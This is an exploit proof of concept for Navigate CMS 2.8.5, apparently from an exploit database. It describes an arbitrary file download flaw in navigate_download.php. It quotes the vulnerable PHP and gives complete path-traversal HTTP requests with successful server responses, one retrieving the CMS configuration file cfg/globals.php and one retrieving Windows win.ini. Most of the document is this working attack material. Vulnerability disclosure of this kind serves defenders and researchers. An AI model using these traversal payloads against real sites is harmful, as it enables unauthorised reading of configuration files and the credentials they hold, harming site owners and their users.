Navigate CMS version 2.8.5 suffers from an arbitrary file download vulnerability.
3e891bc4623c966e8f7dd6a3f0e372e6
# Exploit Title: Navigate CMS 2.8.5 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.navigatecms.com/
# Software Link: http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8.5r1355.zip
# Version: 2.8.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# Profile type users+ can download arbitrary files.
# http://TARGET/[PATH]/navigate_download.php?wid=1&id=[FILE]
#
# /* `exploitdb`.`nv_profiles` */
# $nv_profiles = array(
# array('id' => '1','name' => 'Administrator','description' => '','menus' => '["2","3","4","6","1"]'),
# array('id' => '2','name' => 'User','description' => 'Default Navigate CMS user profile','menus' => '["2","3","7"]')
# );
#
# navigate_download.php
# ........
# $id = $_REQUEST['id'];
# if(!empty($_REQUEST['id']))
# {
# if(is_int($id))
# $item->load($id);
# else
# $item->load($_REQUEST['id']);
# }
#
# if(!$item->id)
# {
# echo 'Error: no item found with id '.$_REQUEST['id'].'.';
# session_write_close();
# $DB->disconnect(); // we don't need the database anymore (we'll see)
# exit;
# }
#
# $website = new Website();
# if(!empty($_GET['wid']))
# ........
# http://TARGET/[PATH]/navigate_download.php?wid=1&id=../../../cfg/globals.php
GET /[PATH]/navigate_download.php?wid=1&id=../../../cfg/globals.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bk1qlak7o03; NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; navigate-tinymce-scroll=%7B%7D
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 12:36:12 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; path=/
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET
Set-Cookie: PHPSESSID=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET
Expires: Sat, 20 Oct 2018 12:36:12 GMT
Cache-Control: private
Pragma: cache
Etag: "Li4vLi4vLi4vY2ZnL2dsb2JhbHMucGhwLWdsb2JhbHMucGhwLTE1Mzk0MzQxNzItMTUzOTQzMjA3MC0w"
Accept-Ranges: bytes
Content-Disposition: inline; filename="globals.php"
Last-Modified: Sat, 13 Oct 2018 12:01:10 GMT
Content-Range: bytes 0-1847/1848
Content-Length: 1848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
# http://localhost/[PATH]/navigate_download.php?wid=1&id=../../../../../../../../Windows/win.ini
GET /[PATH]/navigate_download.php?wid=1&id=../../../../../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bk1qlak7o03; NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; navigate-tinymce-scroll=%7B%7D
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 12:55:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; path=/
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:55:57 GMT; Max-Age=3600; path=/; domain=TARGET
Set-Cookie: PHPSESSID=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:55:57 GMT; Max-Age=3600; path=/; domain=TARGET
Expires: Sat, 20 Oct 2018 12:55:57 GMT
Cache-Control: private
Pragma: cache
Etag: "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vV2luZG93cy93aW4uaW5pLXdpbi5pbmktMTUzOTQzNTM1Ny0xNTAxMTQ5NjkxLTA="
Accept-Ranges: bytes
Content-Disposition: attachment; filename="win.ini"
Last-Modified: Thu, 27 Jul 2017 10:01:31 GMT
Content-Range: bytes 0-563/564
Content-Length: 564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream